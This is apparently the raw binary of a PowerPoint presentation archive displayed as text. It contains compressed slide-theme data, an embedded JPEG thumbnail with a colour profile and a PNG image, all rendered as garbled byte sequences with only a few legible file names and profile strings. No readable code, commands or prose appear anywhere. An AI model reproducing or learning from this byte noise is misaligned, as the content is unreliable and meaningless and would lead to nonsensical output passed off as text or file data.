s....u.....yi.........K|2._....y...9...H..G......r.n<..c.?....O...1h...k>..|..?.i:.[...h...g,.C..................k:.......V.....
..i/w.|T..v._....[j.i.Q.k..i:o......t............s.O.^G.7...n.....m...,.#..5U.MR....Xo5(.....c.5.W.q.<..L.-...=x.o4M*.%......k....P.X['.........8...^C..*..../.....h......r...t|h.....A..m....F.~.a....Z...<W.{..~..>.=a.|..V...,<M{.q........i..}.s.].zq.....A>(.?
>..x.x/_...<;..h.......R..L...v.w}..R...    :o..A}1.U......+wIK.K."[...g......O...Z...E....{..c%..{..Kw.]../.Mcs}u<.....R..,....I.......o..%..O.+.k.G..&.o...%T....m..Wv..-ng.&...t...Z..w.........?.W..?..<k.....<    ...y.m........~..O.[|.....-w.w...........d..p.d......T.....>.._...?.>...........v..<..|........._.G..x.....2....z.....B.>..G....c.....k.{=R.uIt...o.?...]J.U.O./ ..5....F.I.|8...g.....GEU.4.8Y.J..Dj.\.....]f..z...3.x.K[U.u.CC.ou.=ld3Y..V..[.Ai34..E.~D....Gf ]t].....i..).......]._.j.....O.....+......E.}&.......4\k.&.T.[.xU4=A.-..7P......)<Ce.x:..Q....g....S..o..D....=N?...>..~.C.xm....?hO.hZ.....s.rx.C...~.J..........j..[..}p#.q....4........^...\.Zu.....C.... .?.).Y.&....TfGfS.?......uO..#.OF.};G...hu'O.4.K.2..nl,......Xae.Y.' _.l..w...........?...z.;[....9.9....C|...........#.:q....j:........oR......g.....{.....z.'.$.+*)c./_.a..=%....A.....fj"..2...a..<.=.......cj..-}_..I.O...............Y.`;.\..\..$.
..X......IGkps.{.9.;....7..w...(Okp1.;c....o._W....z...s.`t..F.<.?..C.....s.9=I$....?2.?....z[....'....E,.r.q..?..z.n.chK~Z.9..!.=.c...E.<.....k'....Q...........O........=...;..QK0.._.r..w..........._..H}OB..A.F.-Gw.........~..6@+*.../S..<?.7..=.|.y...TR.7/............6....s......S..;..tQ..Q......z....E.....
...............O9.\TRq.z.q....z.n......../...!...l...E\.Z........a...x......._.....-..{...w....n^...v..w.....6....9....H{..[..A.W......d...o.~..9...w..z....[..w.c.<...o]......0...?.....a...^Z.9|...Y?.....O...-z................|.7/o....O......s.......z.....c..N..;.......s...t......G......._..I..~;.....
...#r.........N..{.?.o6/......<?......w.?..o.\./...'.]..........s...t......#...d..........o.w.c....kzl_0...x...;.........r....O~......\.Z.9|...I?.....?_.6@*.]......6...|.=...............;....{....;-.k./..$...........s...t......#...d..E.............._.x..`...............;JZ..................Rs...t.wS.6?.~..6@*.(8...?......}..'.n.2/.>e...<?....=.|.9........'..~.......9....H;.....?Q.. .Y..n^...vo.w>....7.....2............x..iK^Z........s.t`.......]$..........
...F...........>.x...d].yz.....}m..;...v.......Y=........U...s......C.6;..tc.
...F...........>.x...d].yz.....}m..;...v.......Y=........U...s......C.6;..tc.
...F...........>.x...d].yz.....}m..;...v.......Y=........U...s......C.6;..tc.
.............#...:....dP..^....zD;.....9.9..d.......A.......8=@ ...........{.~..    ......2...a..<.=.......cr...0....0........$w.q.v..1../..5.v#...<...P.<....'.?....GBA..../..w...).{r1.{c......
........=b....H.....e.cS._..k .Gg..y......../.?.$.....~..    ..."..2...a..<.=......^1.XtPW.^X......nNrG|...k-.-Ow......v~..z.....5=K.....p{7...GBA....G..s...9.{r1.{...nV..........z.;.....9.9..k.S..c.l.....'.......OR.s..A.........@ E..9S...W.$...n....g...U...r.t...... .=A........PK..........!...s............ppt/theme/theme2.xml.YOo.6....w toc'v..u.....M..n..i..XS.@.I}.......a....0l+...t.&[......HJ...H......D"|...#u.....C"$.I.._.y.$>.h...{....I...3...7#.....{....HL..O.&n{.R.....a...<%    ......W...........j.+1.........1.    .j..VN...5QR..L.4i..0.`R..9.]&.!fm....hH.).1,.L....y+[.W.f...%kK.........U.S...i..h].)...S..^.....z..}.4...i6...NN........f...K...dnu:.f+...5 ..X.o........,...ot...u.o@....._k.7\..E.&...vh..Q/ c.v+.....e.9
.....b...,.b...>.4.aE..f).c......    ...M.K3v...C......j{...2bN......|...|v........<9~....,..IX^.......c...o^?.../.._....?..B..%z....^<{........-......Ht......n.0..d$..b.aZ^....'Xs...S...3..W.:...}...
xs...x....\.hv+.......E..ni^%3..IX.\L......xwq...7M.t.*...8b.3.(...(.....
{=........|....:.V.dHGN4......2......f.>.pV...9t....U.?$.1.M<U8."9.1+..6VQ........T...0.z...j.]....~..G....,v.B.I.....2r.O....*..&Q....@.b..U.|.......8Y....8.>.....#.<@..TT..&.N..fl..)5P..r....v..vo.Z.<.'*.2..:.."...2....>..X.....e....UzY>_|m..c...w.M.i......26P3FnK..K...>..u..I..Y....d`..B...$....h.........2#.J.r    .G3\I[.........$.rH..x`...p~.(...Bs....i.ge.v-#
.........F4S..n.......&/T...... .....p.......    ....r../\..d....H.....qR.+..h=l0.C.)V+qki....,N*.k,a.{.]..G..K@.d:....,AGm..\mz..i..........uC.Y..O..6.OMf..so.r..$..5.....N.H.T;XF64.T..,.....M0.E)PQ..&.....?&...u-........h......."b..Gh......u..>..p.a*.~.{:mm3...,...c.g.1K#..[..y&[.)H....$..V).Q...... U.a.?SE.'p..h..pM,0.....P..*.F...h.L..h..^.....j._.C.....a..N....HP..T$....d...b.l..$YF.DTI\.Z.G.......zo.P..n.IV...d...Y..B......d..ks...|l2.Rn.6Mn.B..=...v.Y...eE....j.Y..J[A+K.....[..X...6s......`...p............7.!?....C.&.a.Q}.6.H.H;8.....`...i..I[-../..-..0...,.>.....e...E.;..ck;......)
C.. c.c>...j..Cp..|?.2%M0.7+.....<...............PK..
.......!.cw..3A..3A......docProps/thumbnail.jpeg......JFIF.....H.H......ICC_PROFILE.......appl. ..mntrRGB XYZ ...........acspAPPL....appl...........................-appl...............................................rXYZ... ....gXYZ...4....bXYZ...H....wtpt...\....chad...p...,rTRC........gTRC........bTRC........desc...@...ocprt.......8vcgt.......0ndin.......8dscm...L....XYZ ......tK..>.....XYZ ......Zs.......&XYZ ......(....W...3XYZ .......R........sf32.......B.......&.......................lcurv............vcgt...........R...........R...........R........ndin.......8...H..W
..K.......'.......P..T9............text....Copyright 2007 Apple Inc., all rights reserved..mluc............enUS...&...~esES...&....daDK........deDE...,....fiFI...(....frFU...(...*itIT...(...VnlNL...(....nbNO...&....ptBR...&....svSE...&....jaJP.......RkoKR.......@zhTW.......lzhCN........ruRU..."....plPL...,.....Y.l.e.i.n.e.n. .R.G.B.-.p.r.o.f.i.i.l.i.G.e.n.e.r.i.s.k. .R.G.B.-.p.r.o.f.i.l.P.r.o.f.i.l. .G...n...r.i.q.u.e. .R.V.BN..,. .R.G.B. 0.0.0.0.0.0...u(. .R.G.B. .r_ic....P.e.r.f.i.l. .R.G.B. .G.e.n...r.i.c.o.A.l.l.g.e.m.e.i.n.e.s. .R.G.B.-.P.r.o.f.i.lfn... .R.G.B. c...e.N..G.e.n.e.r.e.l. .R.G.B.-.b.e.s.k.r.i.v.e.l.s.e.A.l.g.e.m.e.e.n. .R.G.B.-.p.r.o.f.i.e.l.|... .R.G.B. ...\...|.P.r.o.f.i.l.o. .R.G.B. .G.e.n.e.r.i.c.o.G.e.n.e.r.i.c. .R.G.B. .P.r.o.f.i.l.e...1.I.8.9. .?.@.>.D.8.;.L. .R.G.B.U.n.i.w.e.r.s.a.l.n.y. .p.r.o.f.i.l. .R.G.B..desc........Generic RGB Profile............Generic RGB Profile.....................................................tExif..MM.*.................>...........F.(...........i.........N.......H.......H.....................................C....................................................................C..................................................................................................................
.....................}........!1A..Qa."q.2....#B...R..$3br.
.....%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................................................................................................
.....................w.......!1..AQ.aq."2...B....    #3R..br.
.$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....>K..l.......'........,.....VZ..>..:....Z..?....+................6...:......#...K......../.exw.7.u...c.A... .....?F..../...^".....)|k}.xI|....^..h....w?.5..^.<-.[.....*]I.=g........}_.^.._..../..%hz..........]W.....k..M_.>
.t.z...Z..w..v....Cacq._.uq............|Y..;....8.../.u.sT.<........|_......O...Q..5.kw:.......Z.5..k)m.._G.4..-.t..b.m....?..........v.._..K]....o..
.....4u...>4..Z.........-G\...._..h.4..c..6.q.Z...>..7^).,..|3mc.o].x...B.....Co..&..X.Q..O.i.q. ..-..u.......H........?._...../.Z..    ..Z^......_H..j_...........dx.o<5..oq".E#.".<......|...._.i.+.........9..v..g.>0|!....n...z.....8|}.o.h.......xsT...$.t.}.M.4{..C.i1_.z2....mu/xk....xG.~(.tO.....<C.G..........O.X.....\M...M..z.......q...^....3S...........>"Y|!.G........\..z..........$......^
.u...\...v.h.A.<...6....4a.>A........c/._.>.j?...O.C|M...........W......E...}...kz.>=.......|Ai=....O..7.Ep.....`.........................x....tO.........;....k.........T..........k..[.C..B.D.........z...G.....|O.._..b........3....|..5...4./.=K_.?.[[....i.w.L/.]V........x....oX._.M.\hV.g...z...|.'....X...Ww.".g..i~"hP..rI...5.t....z.h./..j.]A..sV.........F....k..|V.b.'....Z|S.5..~$.zt..{.:,:..^1.f.....<=m.........R...?.o..!._..    .|d.U.x.......o......#.....Vl...........+kj.%...ga..B..N(.*..C....o..t.._.<].........A...~8......x.....'..u..X......I..7...si.iq]...K(..?._..[....5/../...N|..57.4.....4.....u..._.~......Y./.xK....I...?...'..~..m.5{..Md..^%.......................    .?.....C....<...;.........];Y.......B...58~...n|."..7..<|...^...W._.>0.....|q.Y./.... ...
........x~M'X.Mk....4Zf..9.t.3P.;;...]c .s~.....A....V...o....<........z..k..^.g.@.-...F..xnm.....h.V..W.`...|/....~../...f.....I......Ti......    <m...^)..M.I..R.q+k.<.g./.|4.....`$.....n5..^.S.6p7.|;.i...x.?.>.k.^.../....;.......CI...5+/.7ZU....[x...T...\i..f.{....d.....n.8m'x.>..g.....o......Mo.x...~?..?'....:?.>..V....w/...............E.......5...n..T...._I........P...;.M.../...|e.?.....<!...|E._.~,x.[...\y._...n.s..Y..>W]..#..?........x....{..>....w.......GV.o......$....o.<={}.^_Z..........<..^.%..... ..h....
.(....O..w.........]........9~'|]............w...s.+O......"x.....5....5....?.z......=)...-.g}J{He.........g.......V.......|&.)...V.{............u.b]k_.,~.|B.|W....>,...8.k..>$.<=....'.u.J.a.Zx.}.R.........FO._.<C._......d/.>....O.8..7.37..+.....U...&......*4..i.(.P........?.4...}9.VY>..\E.<@.....3..c....?...e?.|)..<!..D....m..?i.....R.O.|%...6.q........|...pM....C.z......"..K...E...hz...j.....}K...'.j...?.N....b_..#..*...Y..........o.._....5h?.</..4[o    k...o.'.._.i..."...xf?
h...V.\.6.....g...6...h<..;..x......?..........v.{...V.....    ..7.............Ec....:........#...|C...6.....t......../....P|]...+...*.........../......0...zxO\.G.~..<..X.O......v.....xs..    ..~......[....k..$..........}%...    +...?
...o.X...    ...3.c.K.......5[...<....C.W.M,i^.....u?..}_.V~0...o.........mj...=.z....o....E|R.........).3...o.....K.g.*...x....'..?...~.zg....x.Z.|..
.....g...n-WU.m...4.m...k+..n@>8.S......Y......>.......\.....5....?.^..WO..5/........(.k.z...eG....D..>..W.O.    x...o..;.j>..thu.../.,_./........d..~...~/~...<..6...
>&x_...k...'.zg..&....._n.~......5
..iz..............xQ_.Y\.x..Y.......o...I.C...3..._...d..S...o..ST..4.g...:...\.......!....*.y.a....@.<.u..o.xf.Y.\mi..wQ...._.I....k. |
...../...........?i...C.
k/._.....]......t...o....v....5_.^......x.A.....C.4O.Y.]_.G.Z.F..d...F..-....}.o..".^...<.S......n..~5|*.....9.&.W......2......t?..gZ...[Y...u.4..qC.............?.NO.?...._.`...[.>x.O.Q.....?..h?.?.n.d...~..'..?f...w^..<e....#...j........o&M..p..A_...QK.x....2.ox........    ..X....!.|{.=.J.....5.u..@....@...w.........7..<...ouo..W@...+\.J.um....?.n.v..|om..{...0..j ....L..... ...U|-.A.....L......O....].<.G...p./SmK.?..).6./..............s.].C..)..+...-9.?.u/.$...............e........*|h................]#.?....io.|X...oP.<U.c...>....'..K..}....:..<I..+..........zf.......|W.3|s./.?f..+S.....m..3.....$..?....^    ...e...U..m<{..................q.C._.F.K...........5............>>....._.........m.X..mO.W.....9~...B...>(.^6.O....j......yy.x.m...~?.....O.h.z.......g..@9..'G..g.....i/.&.......^.N....C.........:....V.
..mO...v.8..z...x...I...|9..K.h_..9.j...e.....[k.     ..x..........g._..../.O.+.?.~".../.....;.7.g-C....><~.:.............\h.:.>.i.....O..6.....".W......[...0.Y......<e...,..3.;Q.4mw.J...?......!X..y.~    .......o....r..Mw.o.....sh./.y<m....... ..o/.%....3......._.G.....o..H..g.....oe....?.O.x.....m*...{......M.KV.~.x.._.
YK..X..MoR..f.`......K.;.G..........>...&....:7...~.Z/.......i_.&.....p........\.7....<?.MO....../.x{.:.^ ..Km%n-.........7....|6.A....>.h........!.-.C.4..:hZe..5K..!..Y....6.Y.%.....v....R..Cp..@..@....P.@..~.........$..k...|(.X.+.|........j.x.....M"....<].Y..M:.C<:3.[Em,..........h...)7.C.$.2.-...........5..u/...<Oi...../.R..C.......|>...........Q..>..YxsL.Q..T.l...#.....>S..?ho...`..4.......?f........;N    ......sx..........+...V.?......H.+[.gR..g.....0......Q?...Q...?...>/....hO......o..x../.|.._...G...5...K?..t....].P......a.x{.3n.M..).............|...x~....a........|N.{..?^..b....>x..~...b....?..O......,......}.ZzG.3....L........s............+...4M+....G.5;-k..#...c........Ms...>...[_......w.w...M,2.....|.._.?.>2..<......:...%......G._........W.~.._..kw.>...h.%.W.o^%O...L.....t...^N.M.@.HP.@...~..|G.B...T..j/>=.4.q....~6...#.*.:/........M..k.....?.....[.+J....`-.}KN.....p....i/......    .._...../.>9..m...\...O...s.o......c...t?.x.../.>.....P..#...........n.5~..j...Y.)A.]+..[."......&o.|>..#..W..M..U.|.'.t.)|s.K...D...s..K_.....V...v.z..y.........|0......3....-.i..K..9...&..'....    ......{..[.....-..-R.km;L...........[.....m..x....|C..kJ...c.k..;.C....eq..pk.%.~...._.x...E.t[.}OG...2.F......uouo.....P...G.........(....._...<)...x.U....~)x.[.<../..._.....k....*.7.m0.N...C....>...?    .........'.[...,.....P.k.SV...N..hZ%...O...V.&-+.~...}{Rd..Zt..J.|.k.......[.3..?...)j~........./!.....iK..>$..i.=?.W:..............%.u.o....]/P......\.[.@......\....._.....V........o.<oa...^:../..[.<...R..4KO.x............C_j.s..k....-4..mj..4iV..}%.o...v..._..|..;K./.o.?....g..'F..E....~._......+.6.;.-...g.....L..0..Q...S...t.k..`..(....
.(....?.?.....<Y...._./....,.W.....
.........1.-o..i_....W....>1.....H.....M'.|G..].F.gk.R....(.................Y.....Z.............?b..'.v...o.o.~.~.....o.w...~....?@{..Y...I.e.....{.x5m'H....g./a...m.P..?j..._..j.....G......I...(..O....<..j..i_.[.S.U...z......._.4-b....n..M?.&.....(.-c.>+.V......WS...;y./|o..m_.W..d......g.........._....?.........o.x:?..$.'.F.e.z?    ..@.|Q..F.....X../..f..x.J..K..>....<..i.l~..4....-.....S..8o..G.<................9x..:......|0...W...m.^...<d...+>..yL.....(...i..~.?.<u..[..>..i.>.|]...{..........|h...x.G...s.......A|I...6|F.|@.z.......w........t:n.....M.......'~....S..+..5/.?....|/.\~.......q.....o.......<E.....1........}...    h0.~6.4......$X..j.I..Ifl...............<...f....]...+.O.%...4..|(...j..~......o..1.G.n|5._.....[..<...{......d.............zm....}~......O.....<....._.3.s.^....M.......M~........9.....S...l_...T..]..3......;..^..n.....C.;...Z..7.Ka~.......,....~._......'.....u...6....[.s._.>:j..}.{...    ?dO...?.I.|P....m....n...j>......J(...L.......f..._............7.+..~.._.M.._~......a...~.?..    .+..|:..g.....<..>.J.....k...I...?...).......M:.L.6`...O.~(.......^...|h.......>?........W.#.....B.............7x.[_.......&.h.>.xG.Z,.).Z.M.K..}.......:x....+.......\...]...<|.....a_...|!...O._.hKD.....O.5K..>2......|+s....:e..<I.[X.Z....=.h.......O.c...._.....k......_.7...x..R..u....W......i...._.'.n..M|    ....~...o.....O...#..<....V.d....t.....c.*..?.5.o.......P|9....#...>0.....<.s{..x..h.....b.............<&.<.u.3.7..7.V..A....|=..._.?...
.%.......8.se...W.........."._...t..~.....hp...n.....J...G...K.%..>..D....x...H.z..u..:=..~.....?c......~.._oa.@............y?...~8......S.F.....g.O..#....<].?...,......^...<.{........N...5..7.....|.%.....S.
..w.5.......    ...........?g..._T..u..x.G...?...z..(..
..6...:g.....b.T...|G........l._..;.1|........    l..........u...?....$..<G..../..{......    .C^.._..~..$......<..q.j:>.i.....I......>.xC.....?.~1xs.;...:X7.I.}x/....~...:...>.k..
.-..%.g.o...........<....Zf.......I...F.g.mR_    .:N.`u......?...........K...?.?d..........~._...o...w..Ox.....w...."xO.ZM.....~+.....x.    .t.7.~..|Q..n..S.......~..^~..L.~..2.h/....~(.s.o..~...?h..?.O.|3.k../~.x{.....u..|8.f..........K....^    ......mFK...)t...p...o..W..o..._.......
...f..(.....@.c_.......!..<Sj...._..>..|I_...ox.....&.G..7i}..7P....`.}.....?d..3..o.(..cq..|j.}...........!...5......_......8...~7.y....q........Z...k1..l5K_
xwP..sgmb.......6....k........e..h?....!|    ...\~.....c.+.W.....ce.O....~.|S.k...wz..W...4|.[..~......Ca...^..t.xKJ...].U..........<9.!...>?..W.M....h/..?..A.........|...S.V.o....h.[V...n.....vZ.....E.<C.../.t.#.... ....P.@....P.@....P.@....P.@....P.@.....7....~._.......~.x....=....    ...H.......k[/./..Ce5....x...O..............^-.....~.|2.w.k.~..[......m....T:..<....N...|7.[..v.>.....X.e.k.D.+Ou4.S....+.w..P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@......t..z...W.......;.....].......d.M..~...h..|Q.].[Z....$.y....MZ}=.R...1...|=.v.?..<Z.....:....|5..7.X..2.}t.X]q|(.SO...F....9m.M.kZ......aqq$...,@....i.Bo.......&.u.o.i.....0....5[_..o..........o...u.....I...ezC#Ik@..,..-...c.~..b./.7.7.&v..t.k/
\.e.?.|-i.]K\.Xk..)...D..+w.....m.m..[..l.......k62.._....}./....q...x.....f...x^o...6...KSY.c5..d^$...h./......{k,7............x....~../.|}oy.*.fmCL...m.....g..kZM......K=v.O...;....5k5............l.J..^........b......^.....&....`_...T..{...j. ..v.y=.h.n...Z..m{K.d...GO.....7~.^....xkN...&.k...}....>    ..m-.o.Yxi.t..j.!..o.......U.J......;....H........]_.Px..^9..3.....D~1v.....k.............../4.....5;>.......E%......`.......t..._R.F..._.7>........t.._..OX...V....Y.1.-..+%.O`L.R.o,r.....?......
...b.=.'..8.g........'.'.<..|8.........>.....]cC......>..K..M.T...U.]5.......o...6.....j.=.....&.P.,..
x.....;.{..Q.f.......f.7.......mg1-..X.nc.H.....m.U^...]...G..U..W.^..<-..N......k.|.../x....k>+..56.,.o~.-..D......Cyh..P...C|j..;...S...__...:........E..._..WV.5.tMCGkg....X...b...A..Uh.:.....?...u...q|...u.x.....W..'..]...w........P...<.......O.\.K..d>.-.*..j..........=..G.?.E.|F..sy...x[Z> .I..Q.....es......../.ol.+)...........+K..A...C.. ..._.>+...x...=....o..9..o.i~.........R.......5.b....2.+}....(..,........t..|7..+...Z.......|55...x2.M..|(..)e..n.....j.
..+..t...k..U [.,V.....b..@....P.@....P.@....P.@....g.q.;..M.    ..A.x.....p..*....v.^...
...x.T....5....9.K?..z....d.....r.M..'J....O..w.>..?...k.7..i~..<....T......R..4...7k...Ai.\Dm..t..{>+P{.....u?....K........gR.........i.._.R.A...\..`...x.i5....m.....H4...P.................~<..../....u........Y..A........S...I..M.].jV....j&....mt.*.    5........lo.5.O.x#.......O.<s....2.....,n!..^$O...Y.wZ.4.o.\i.x.(/.....m.....3..........ei......ox..V...[.k.tX......1...\..4..........(.=....f.M.....F....^..;.....#.U..o...j......m.[..s..k.P.O.y....Z..]..E&..}..s....._.u..x........c..%..<c..MKG....m'O.4..k.N....> .X....o..Pg....wP.W.....E&.P.U..7....z...V............\.......x..R..K9#k-1f'E..Y#(.........-...=.P...I.....x...,..H.7ksc......s].#L.....$.#.K[<.k+8....?...z........k.;T........]......o..'.4O...M...+=Y\..xY.y..a dB..]~........
....w.]..-.....=...}./..p.kK.o..g.......A..>.=..7.~.k......7.W.:|.....x._.......]3........>...^.|#....m5/...L..-..tK..OL.&.......Z..yd..7.~..5....|.i....u..k.    ..U..hz...........F..t..d.................?f....6..O..2..._.......v.=..?.t....W.vW:.......u..t..n4.6.Cm.Y.Emn..T.....K..e...+.&.u....O..|g....vW..>.<ik.x........*...z7.R.xj.....,dr@....u..c....1........lQx...Oa.x..z?.=^;K.u.....i.h.....?.....c.o..L...n.O./...j.6.....A..7.7.t.[Q.O..A...h.Hm    .q._.x.^.'./.C'..i...w..+.Y.-$....K..`...
.(....
.(....
.(....
.(....>7..^/.O...........S.l.....mz...i.?...=n.U]J.:.L.<S.?....6.[L.......R ..x......u.v.]]........[K.y.....uMG...=G......mW.PA..!.......&..[.4.m`....0S...Y~..:...._.>..F......+.5..>.Z...L..~ .T> ..<Z..r.to.O.^Z...]..^Y...\..;p
._...,..._...K.....u........&......6.|gm.h.Z.........7>!.....,.5    ~.bKy@$.?l..i.......]{..A..U...'.g........o.x.Q.......$..|Ky=...][h...jqA.....i........W.[.._.z.......x.Z...~    xb.5..i...u....X2jv.o....~#.m.....i.....M..m.M.........."........s.{k1..U..Pk...W.......m.xSG......%.....C..Y.K.......kow+Kk..w...^......:...,.u_........m.]..1........XxzN/.....S.sK...]...x.c.#h......u.........k..}WS.......O..>(.6.y..s.Z........0..x...o...+P<J.z^.owkk.{95......O..-.....OP.......7...As.x......o......Y.u-.J.......SI.O....M:..#.F.K.ll.~.....Ew...O..9....o.._7......xK......]g\T.L..^.qh7z....S.jz>........O......D.?..?.m......?...1...}......64....2.P.%.F.m..R.i..~!.ug.H.-..............^P.@....P.@....P.@....P.@....P.@......:.-...T...../..7.<...6..mKZ.[..j....y..Z~.i......W.j....e=.f.Q.PT.f/..../-o..l.\X..7.-.Z.......++.;....=Ul...X.W..k..jQ.?.!...Z0
....~.x.........i'.u....N...~9.......~ ...x{H.<I.h.2..)....;ag..k&..v.lW.ZOn......kL...oK.....Z.x.c.L....>?...h5..\x
...0..:....h5V...xz..t.......f^~......J..].Y.....V/......>!...-.....Z.....:V.....{R..o?.,..+................}c.Mu...&...g..K.+..,.o...c..?...............4K.'N..D..k...d...I@6._....u._U.w.a.........ZY..hc..'./.5-cD6...........Z..1kvR...R..........iZ....6^....{.,.{m#...+G......-..SA..am.j.*>...!....|N.m.5..m..j0.bG.,...m$...Y.j...!....O.?.zG.u..Y6.q.T.'.....x......6..V:....!......#..5....CQ..O..xJ.......j    |k.........."I....e......9......:...b..    }...@...._....t......Z..<?..N..K.g.48.|5.M-......E..,<Y.iw..{.....W[;.e..d........._.<.{.......M.....?
t...u..m...\.....vjZ..s..g\.....j\$......Q.H.X.=&.
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....
.(...k.X_j...lt.;....).h.l.{...6..<.!..E.RM!.#... .(....
.(....
.(....
.(....
.(....
.(....
.(....
.(....+..Z.....[[..^..iygw.w6.v.1.7..6.+.=..;.42..,n.....    ..4X.UH.U..B.".....UP.U....b..@...PK..
.......!..hL.#k..#k......ppt/media/image2.png.PNG
.
...IHDR...I............B....sRGB.........IDATx^.]......Y.s...q!    ....[[
..K.C...RZ..
-R.%......\.z........o.......^2..l.f............vh..0.a@....}...>.........4.h. ..x.6.4.h..0.a`_..........0.a@......is@........5.h.m_.Q....4.h..x.6.4.h..0.a`_..........0.a@.......=.X..?q....Q.U.Mo...7a.2.Q    ....a@.@.1.....45.dY65.....!j_.a>..`@.mqcMd..........A8DZ.5.h...@.x.....s....-....W.|.}....mR.....x{...0.a.0......(.-.....Rr....=......oh.b..W.b...i..'h(..=J....DT..1p.._k.a .....%...+.R@.1...:b..P....$.....2..:.*xCYi.O.....J...1..>xQ..\.@...H.!+g.S..x.........,....&.5.SW.M.....^5.K..E.n.
fH.'..0.z.&........5..^.......P.<<#.8^.p..8Y...1..7..c..0...eQ.z....=J.M.h....p..T...v.`../G.^\...t...(2z.3..N.w...2i3..E.A....3....N...^Q`84..r...NO.....&<~...x..0,pb.Y.
.9F0...77yi_Wc. ...B/..N'...#....4
:.E.....3..*...Dy(....^.S...g...?.s .(.-.    F.]5...$.$.a.D...8...e....MG.... .%9. .EO.....X4.c.8.E.$L.A.....3....a......bzlz........^b. =2....(.=.c['(.#;.c....U,.!'d5.......E.#....yK.....-...fk...Ec.e......=N....SCEV0y...N.a........]&.Wb..E2...z....3]]z..fy.%G..rs...%O:.c...^....dvdg9uP.....[..&...,yE{N..b.Y..1.....x.,.....E.%......^....h..z."k....&..../...9....:[......+'.k..Y..4J..
F...rx.m....X.YF..2.......'....$.<.Sk. ..9....h..E.$..XY6.......z.....N.....QcJ'.....c...../......i..@NC{H1...h..`-..F.8........v    =....,&g..3$.^..d...T.^.........m.../._~..U./.8k.........X.p..2.......ywgk....v.i.u.z%.D.O)...`....[..._..F.........5...
......t.y.X.Wux.P..O.f.j$91O..z...?.(......^p.......{9A.....c:..z..{x.....>...{....Y.d.WS....F...u>..#..Z....O...n.t3r{...t<.wv.p....n....:.....C.....n..q..Ky.y...~..$...y[..i......a..;..+..~|..).. ..x...........b...n...mp.f..m.<....'.|.e,....F.8.......Pf..O..y......./.............9.@f    8..6A'
.:......O\.E.........eH.xKn...h..y..uV......'......s)n.&.x.(...+zwV...f.!G../..E.....??T.....:.....`.}k.O.....V..H.......]=...8......6.[:.^...P..G.2$..NCc.....;y.X...p_.#..A..?....f.
#.5.._.|.e.]|.A..^1.Jhk\.....].....,....Z( .......z..q......y........eE$..g.....cjvd74..[..^....C....16...wD...\g;.........`.....x........;.6....Z.M.\.S....'z..#.t..Q...H.....3..<....b='....z..VN..+2...j...f.........j...&..%E..k.......;sY...a.. ..H.
F.'I=W*7T_1x...f....x(.@.L#wA{.
4....X2C
y..f.......O....3..=.../.l....;...a....U......5.]..3...S..[2^r...U.A.D...X.DA.<...sD..k.z.s....E.X..1....d.Z..v...@.\!...S.
.Zj..0.J.F...1.L..g.c.mSA.....B.#.......*...f......./.-.Sf.....\v....z....r...p.#.\v......Y....^6:.p...9J}..Ij...,
Y.XQXT._..e[...&..........].?..0g..)5.n.....D..R....|p.dZ....A.0L6.Y.SH<...mL...y...z9...[n~.._x./.n....!Gd....`S.z._..L..........q..p....^oom......@    ..+.u|............p..{7l.3...Hz.r.m.lqy'O..U.....&~S..b...)*.L.... .8.erX. q}.7b.V.s?T.7.........v...j.=...oz..+....?......w...uW..Z.............C.    ..t.`..........=^y...>I.........|.v    QP.;....."...9I.. 3....b......3
".@..}Lc.~.......    ....VBW.,......^.@.!.G.....lN..yU..=......uY..t...NG...........{...8y...W4..l..W..,....
...WM.h............2.....m55..CFN.:nl...d\....,<_`.....Fs....7.8=.{.J&.>......."...h$.uF=..nK.= k..1w.......)s...F..R.G.%....
..|...`.7..z....E.....X......|...].mT......6U..{F.8g.......k.....I...el..m....\5a..j@..~EH....t......&.!.+..B'.byr..o..7"..6Qj.J.q............1.V.......&...]..v.....a]C......o...,.i....}......z...A.....=W....V..3[.(A.E.....&...z.W....g2`.1[I....dv..z<[.....z.>6.N..f6.    .......W/.^...e..=....S....'.U......2.Z.W.H...cIIp    iP.. 3..%1)..C.N.}.g.....]ZZ.?rT..n.8'.........e....b.t...... .LR)..B4. .1'g...f^..z5.#x.z|D^R.....i...4g.!'.......y.VF(......_y......{?..S...6....7.......j"......u..}....}...?...e..[>.#.Wb....;w......-..N.@..{\.,S.r..Z..?...}..z..K_~..ek)Q.a..Vg)...`....'e.Y.;..v.2A.D.(..8.]..5.<nq...CgL5.....]M.F..c#x....kw..i*(..:~.]t....O....6....7.|.xx....^.....<.......j....v.|....>..=.|......+r{..\q..c.5|...%KY.e.    ..<..&..,xz9...1I.z.&I..]q.A..;....v....N......m.^...+....?........;X.....#zJY.Q]...W_...z.......dw.
8=.....uv.....0.v.ao.,....EH.s..f.^#..|..D.@..otm..jw3.v.:..
k.......c7......A..Y
....y../...{^...?............-.....X.......7&.Qb......F........v.W.w....    ....O.....=..e....v....W.0.)...ET..b!...z.^..zm..5&.e.a.Z.....W.j@.A#a.....8......=.............=)[.j.,....`.........]....>.XT..YO
